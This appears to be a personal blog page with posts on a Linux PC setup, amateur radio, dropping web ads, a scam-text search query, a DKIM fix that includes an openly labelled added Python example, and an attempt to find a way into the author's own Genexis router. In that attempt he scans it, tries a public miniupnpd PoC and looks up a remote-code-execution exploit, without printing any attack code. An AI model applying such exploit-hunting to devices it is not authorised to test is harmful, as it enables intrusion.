I found a nearby computer store specializing in refurbished PCs. I went with a Lenovo ThinkCentre M710s with 16 Gb memory and 256 Gb nvme storage. In a nice small case. The shop sold it with Windows 11 Pro pre-installed. The seller asked what I wanted to do with it and when I said I wanted to 're-educate it with Linux' he smiled and did not go into standard things about Windows. The built-in video is an Intel HD Graphics 630.

Making the USB stick to do the installation took longer than the actual installation. Graphics worked fine out of the box on two screens. The assumption that the left DisplayPort output will default to the left screen worked fine in Linux, so no hard work to change the screen layout this time.

After the first installation came the installation of amateur radio software and tuning things to make it work my way. I used my notes of how to install cqrlog in Ubuntu 22.04 and how to set up linux USB for the Yaesu FT-991a.

When I changed some things in DNS I ran into weird caching by systemd-resolved and I decided to throw that out (I have a perfectly good resolver at home where I like to have more control and insight) like in disabling systemd-resolved on thompson. After that firefox couldn't connect to anything, it seems the firefox snap as produced by Ubuntu is configured to use the 127.0.0.53 resolver directly. As I had some other annoyances with the firefox snap I just threw it out and switched to the .deb version, using the notes in How to Install Firefox as DEB on Ubuntu (Not Snap). I'll get the updates from the Mozilla team. I also changed the 'default webbrowser' from /snap/bin/firefox to /usr/bin/firefox to have menus and opening links from other applications working again.

Data saved by cqrlog, fldigi and wsjt-x was simply copied over. Currently PyHamclock doesn't work. I had to change some things for python3 and it still throws errors which I can't fix at the moment.

The name perlman is now added to The machine names.

2024-03-11 I participated in the EA PSK63 contest
Mapped contacts PE4KH in the EA PSK63 contest 2024
Last weekend was the EA PSK63 contest organized by the Spanish radio amateur club URE each year. I participated mostly Saturday evening and Sunday morning, Saturday during the day I had other amateurradio-related things to attend.

In total I made 89 contacts, 68 on the 20 meter band and 21 on the 40 meter band. I gave the 10 meter band a try several times but heard/saw no other stations and nobody responded to a 'cq eapsk test' call.

No spectacular DX, a number of familiar contest calls in the log. The first contact in this contest was with EA4BAS and I think I have that call in the log of all Spanish contests I participate in.
Read the rest of I participated in the EA PSK63 contest

2024-03-06 Stopping with advertising on this site
In the past I had some articles that got a higher number of visitors, and I added google adwords to those articles so I could maybe earn a few cents.

With 'higher number' I mean hundreds of views in a week, not a real slashdotting.

I always set the google ads to maximum privacy and minimal tracking, but even with that google started requesting a cookie consent banner for those ads. I guess web advertising without privacy invasion is impossible.

I saw a remark (Note) with:
People be like "modern web sucks, I want le old internet back!"

Bruh, you can bring the "old" internet back any time you want. You can run a BBS, a gopher server, FTP, your own mail, your own http1 web server, your own blog, implement your own "retro" protocol, your own hidden service, and you even have a lot of revival projects for msn, myspace, etc. Like... you can bring it all back any time you want, bro.

But you are not going to do it. In the end, you are going to stay here. And accept the god damn cookies.
And I answered:
@enigmatico I rather share something on my own website for people with a similar problem to find than for some company to gobble up and reuse so the 1741 carefully selected advertisers can track the visitor and the site can maybe make a few cents.
That's what sucks about the modern web.
Because that is exactly what this website is for. Not to make money, but to share what I discover and want to share with the world. I happen to like writing about those things. And if something I write helps someone else solve a problem: good. I like finding shared solutions and good ideas.

So rather than give in to some privacy invasion I decided to disable the advertising code. Maybe I already invaded privacy with the earlier ads but this was a defining moment to stop.

2024-03-05 Very specific search terms for this website
In December 2022 I wrote about Dutch-language bitcoin extortion.

Apparently the same extortionist is at it again or someone has reused this extortionist's text, because today I get this nice notice in the 'google search console' overview:
Top growing queries Compared to previous month

unfortunately I have bad news for you. a few months ago I gained access to the devices you use to browse the internet. after that I tracked your internet activities.
So very literally the text from the item. I hope I have been able to teach people that this is nothing but a scam.

2024-03-04 Another evening with the Genexis Platinum-4410 router
I had the time and energy to pick up the Genexis Platinum-4410 router that I tried to find an entry into almost a year ago and see if I could think about other ways to get in.

Trying nmap

When I scan with nmap the result is just 'all ports are filtered'. By hand I see port 80 http. So there is some sort of firewall (all those other ports are not responding at all). This is confirmed when checking the firewall startup script which allows port 80 and 5000 from the LAN side.

Trying to get in via miniupnpd

The router has UPNP but it's disabled by default. When I enable it, this is what answers on port 5000:
Server: 1.11.0-R UPnP/1.0 MiniUPnPd/1.4
So searching for exploits I found b1ack0wl/miniupnpd_poc: Read out-of-bounds PoC for miniupnpd <= v2.1 and this failed. I kept getting the answer:
HTTP/1.1 501 Not Implemented
Content-Type: text/html
Connection: close
Content-Length: 149
Server: 1.11.0-R UPnP/1.0 MiniUPnPd/1.4

<HTML><HEAD><TITLE>501 Not Implemented</TITLE></HEAD><BODY><H1>Not Implemented</H1>The HTTP Method is not implemented by this server.</BODY></HTML>
Checking the /usr/bin/miniupnpd on the extracted image gives an idea why this isn't going to work:
SUBSCRIBE
SUBSCRIBE not implemented. ENABLE_EVENTS compile option disabled

Vulnerabilities in the webinterface

A search gave me Remote code execution in Genexis DRGOS and the original url with the exploit has been disabled but I found it with the wayback machine at Genexis DRGOS remote code execution in versions < 1.14.1.

The default firmware on the router is indeed 1.14.1, the old version is 1.14.0 which allows me to compare those two versions since I unpacked both of them to my laptop. In the shellscripts for the webinterface I see a lot more defensive programming avoiding similar exploits.

Considering USB storage

I see the device has a USB port and I wondered whether it supports usb-storage and how it automounts that storage.

Yes it supports usb-storage, but it mounts the storage in a fixed location, not using the volume label of the filesystem. When usb storage is introduced, the script /sbin/usb-storage mounts it on /mnt/usbdrive. And at the moment I see no service that actually does something with the mounted usb-storage.

Under the hood I see OpenWrt

I was looking at the bootup messages, and I noticed something:
Freeing init memory: 9680K
Please be patient, while OpenWrt loads ...
init started: BusyBox v1.11.2 (2015-08-13 10:17:55 CEST)

(none) login: uci: Entry not found

Saving / restoring the configuration

The configuration is saved directly from the configuration commands and is restored the same way. But there is a checksum involved which uses data that isn't available in the dump itself.

I found some discussion of this format in German at Firmware drgos-hrg1000-1.14.0-R - Bürger für Glasfaser Support.

Current status

I still haven't found any vulnerability that would let me get more access.

2024-03-03 New country in amateur radio: Gabon
Yesterday I was checking the Reverse Beacon Network for interesting callsigns calling CQ in morse and I saw TR8CA from Gabon, which is a new country for me in amateur radio.

I managed to make the short contact without having to try for hours so that added the country as 'worked'. The next thing is getting it confirmed and I saw the confirmation in Logbook of The World today.

The Reverse Beacon Network uses amateur radio stations all over the world that automatically decode morse signals on amateur bands and try to find CQ messages with valid callsigns. This data is then processed and available via the Reverse Beacon Network main webinterface and via other ways such as HamAlert. For 'chasing' morse stations the Reverse Beacon Network together with HamAlert are a great help.

2024-03-01 Finally passing google DKIM verification?
The earlier problems with DKIM verification at gmail seemed to come back and I searched high and low again and found Google says DKIM fails, everyone else says it passes : r/email on reddit which describes my situation. The specific reply 'try setting "Canonicalization" in the OpenDKIM setting to "relaxed/relaxed" as a lot of MTAs do an implicit 7bit/8bit conversion and that can break DKIM with a "simple" body canonicalization' was the one thing I hadn't tried myself, so I changed this.

The first test mails I sent to a gmail account verified all fine, so maybe this is the final fix. I'm not sure until I see regular positive DMARC reports from gmail.
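What the "simple" and "relaxed" body canonicalizations behind that OpenDKIM setting do to a message body, as an added example that is not code from this site or from OpenDKIM. It follows RFC 6376 sections 3.4.3 and 3.4.4 for the body only (header canonicalization is not shown), and the two sample bodies are constructed.

```python
import base64
import hashlib
import re


def canon_body_simple(body: bytes) -> bytes:
    """RFC 6376 section 3.4.3: drop empty lines at the end, keep the rest."""
    while body.endswith(b"\r\n"):
        body = body[:-2]
    return body + b"\r\n"  # an empty body canonicalizes to a single CRLF


def canon_body_relaxed(body: bytes) -> bytes:
    """RFC 6376 section 3.4.4: also normalize whitespace inside each line."""
    lines = []
    for line in body.split(b"\r\n"):
        line = re.sub(rb"[ \t]+", b" ", line)  # runs of SP/TAB become one SP
        lines.append(line.rstrip(b" "))        # whitespace at end of line is ignored
    out = b"\r\n".join(lines)
    while out.endswith(b"\r\n"):
        out = out[:-2]
    return out + b"\r\n" if out else b""       # an empty body stays empty


CANON = {"simple": canon_body_simple, "relaxed": canon_body_relaxed}


def body_hash(body: bytes, canon: str) -> str:
    """Value of the bh= tag for a SHA-256 based DKIM signature."""
    return base64.b64encode(hashlib.sha256(CANON[canon](body)).digest()).decode()


def survives(signed: bytes, received: bytes, canon: str) -> bool:
    """True when the body hash computed by the receiver still matches bh=."""
    return body_hash(signed, canon) == body_hash(received, canon)


# Constructed sample: the body as signed, and the same text after a relay
# collapsed a run of spaces, left trailing whitespace and appended an empty line.
SIGNED = b"Hello  world,\r\n\r\nthis is a test.\r\n"
RELAYED = b"Hello world, \r\n\r\nthis is a test.\t\r\n\r\n"

if __name__ == "__main__":
    for canon in ("simple", "relaxed"):
        verdict = "pass" if survives(SIGNED, RELAYED, canon) else "FAIL"
        print(f"{canon:8} bh={body_hash(SIGNED, canon)} -> {verdict}")
```

Both algorithms hash the body bytes as they arrive at the verifier, so whitespace differences are the only changes that relaxed absorbs.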

2024-02-29 Yet more delay with Open Dutch Fiber (ODF)
Halfway through January 2023 the expectation was that ODF would install fiber in my neighbourhood in the 1st quarter of 2024, at the beginning of January 2024 the expectation had become that it would be installed in the 3rd quarter of 2024, and now, almost two months later, I check again at Glasvezel in Utrecht - Open Dutch Fiber and the result is
In the 1st quarter of 2025 we will start our work in your neighbourhood

So in any case it is not making much progress.



The person

Father, cat owned/owner, Linux fan, Internet user, book reader, radio amateur, recumbent bicyclist, snowboarder, ipv6 fan. For those who don't speak Dutch: how to pronounce Koos van den Hout.

The job

Specialist information security at Utrecht University with a modern Profile page.
 


Contact

Use the e-mail address in the address box and use PGP private secure e-mail when possible.
, reachable as koos+website@idefix.net. PGP encrypted e-mail preferred. PGP key 5BA9 368B E6F3 34E4 local copy PGP key 5BA9 368B E6F3 34E4 via keyservers

My opinions are my own, what I write is protected by copyrights. Some publications contain an explicit license statement which allows sharing without asking permission.